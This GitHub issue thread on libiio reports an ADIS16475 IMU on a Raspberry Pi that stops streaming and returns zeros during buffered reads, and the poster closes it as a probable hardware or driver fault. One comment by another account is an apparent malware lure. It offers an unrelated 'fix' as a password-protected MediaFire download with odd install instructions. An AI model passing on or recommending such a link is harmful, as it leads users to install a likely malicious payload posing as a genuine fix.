analogdevicesinc/libiio #1193: Device stops streaming data after a while and becomes unresponsive (only when using buffers)

willat343, 2024-08-26:
Hi, I'm hoping you can help me with a puzzling issue.

I am trying to stream data from an Adis16475 IMU (internal clock mode) using libiio and the kernel driver (with an up to date kernel version), on a raspberry pi. Currently i have v0.23 installed since this is the default with ubutnu 20.04 but i could install 0.25 from source if this will help.

To summarise, my application does the following:
1. Creates a context.
2. Finds the device.
3. Enables the 8 channels i want (3 gyro, 3 accel, 1 temp, 1 timestamp)
4. Does some checks (reads product id, factory resets the device, performs a sensor self test, checks the diagnostic register) all with sensible delays afterwards.
5. Reads the scale and offset values for the channels that have them.
6. Sets the samping rate (a device attribute) to a rate valid for the device (E.g. 200 or 400 Hz).
7. Finds and assigns the trigger (which is adis16475-2-dev0 in my case)
8. Sets up a signal handler, so that i can interrupt my program for a clean shutdown.
9. Creates a buffer in blocking mode.
10. In a loop, i check the diagnostic register to ensure the IMU is healthy, then i refill the buffer, then read the data. I have tried both `iio_buffer_foreach_sample()` and also reading the data iteratively with `iio_buffer_start/step/end()` functions.

Both of the buffered reading methods work for a while (longest 30 seconds, shortest a fraction of a second). The data I read looks correct, until suddenly all the data is 0, except the timestamp. Furthermore I can no longer interact with the device (e.g. read/write registers, and the data at `/sys/bus/iio/devices/iio:device0` is all 0). The only recovery is toggling the GPIO reset pin, or rebooting the RPI.

I am able to read from the device indefinitely if i read the raw attributes (e.g. at 400 Hz) either with libiio's `iio_channel_attr_read_*()` functions, or by setting up the buffer with some echo commands at `/sys/bus/iio/devices/iio:device0` and listening to `/dev/iio:device0`.

Do you have any idea what could be causing this?

masooddahmedd, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

willat343, 2024-09-05:
While this issue hasn't been resolved, it does not occur when running at the maximum IMU rate of 2kHz, so likely an issue with the hardware, RPI setup, device tree, or a but in the kernel driver, but not libiio

closed 2024-09-05 by willat343